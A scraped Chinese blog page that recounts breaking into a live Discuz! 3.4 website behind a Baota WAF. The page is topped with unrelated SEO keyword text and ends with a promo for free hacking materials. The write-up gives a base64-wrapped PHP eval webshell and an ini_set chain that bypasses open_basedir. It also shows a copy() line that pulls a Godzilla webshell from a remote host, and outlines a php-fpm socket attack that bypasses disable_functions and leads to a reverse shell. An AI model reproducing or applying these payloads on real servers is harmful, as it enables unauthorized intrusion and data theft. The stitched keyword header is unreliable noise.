网站已经备案更换主机江苏天德建设工程有限公司网站
news/
2025/10/8 12:33:42/
文章来源:
网站已经备案更换主机,江苏天德建设工程有限公司网站,北京百度关键词推广,上海进出口贸易公司有哪些这次渗透的主站是 一个 Discuz!3.4 的搭建 违法招 piao 网站#xff0c; 配置有宝塔 WAF 用 Discuz!ML 3.X 的漏洞进行攻击#xff0c;但是没有成功 发现主站外链会有一个发卡网#xff0c;引导人们来这充值#xff0c;是 某某发卡网#xff0c;而且域名指向也是主站的 ip…这次渗透的主站是 一个 Discuz!3.4 的搭建 违法招 piao 网站 配置有宝塔 WAF 用 Discuz!ML 3.X 的漏洞进行攻击但是没有成功 发现主站外链会有一个发卡网引导人们来这充值是 某某发卡网而且域名指向也是主站的 ip两个网站在同一个 此处忘记截图了
网上有通杀 payload写 shell 的过程在这里省略了 由于网站存在宝塔 WAF 写入 shell 必须变形一下将命令进行 base64 编码在传进去
?php eval(base64_decode($_POST[yanshu]));?在 phpinfo()里可以看到宝塔默认会设置 open_basedir 以及 disable_functions导致蚁剑的 shell 直接连接之后不大好用命令执行不了
绕过 open_basedir 查看文件
利用 ini_set() 来 bypass open_basedir 来获取路径名和目录内容base64 编码之后执行发现宝塔目录下还有其他站点目录
eval(mkdir(1);chdir(1);ini_set(open_basedir,..);chdir(..);chdir(..);chdir(..);chdir(..);chdir(..);chdir(..);chdir(..);ini_set(open_basedir,/);var_dump(scandir(/www/wwwroot));); 哥斯拉管理 webshell
为了方便查看文件 使用哥斯拉马加密器选择 PHP_EVAL_XOR_BASE64用 copy 命令传到服务器中这样流量就可以不会被宝塔 waf 拦截了
copy(http://xxxx/g.php,/www/wwwroot/xxx.com/g.php);哥斯拉马可以自动实现 bypass openbase_dir 读取数据库 用户名密码可以更改管理员用户进后台或者脱库 绕过 disable_functions 执行命令
disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函数环境是 php5.6导致很多常规 bypass 的方法都用不了 网站是使用 nginxphp5.6 用攻击 php-fpm 的办法来 bypass攻击原理可以看 参考链接
先找到 php-fpm 的配置 如/www/server/php/56/etc/php-fpm.conf 或者看 nginx 的配置 得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock 首先 选择 PAttackFPM 将模块加载并执行 再利用哥斯拉马中 bypass disable_functions 的模块 成功执行命令 获取反弹 shell 可以进一步尝试对主机进行提权了 学习计划安排 我一共划分了六个阶段但并不是说你得学完全部才能上手工作对于一些初级岗位学到第三四个阶段就足矣~
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦无偿分享
如果你也想学习:黑客网络安全的渗透攻防
今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。
在这里领取 这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们其中包含以下东西
1.学习路线职业规划 2.全套体系课入门到精通 3.黑客电子书面试资料 4.漏洞挖掘工具和学习文档
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/931510.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!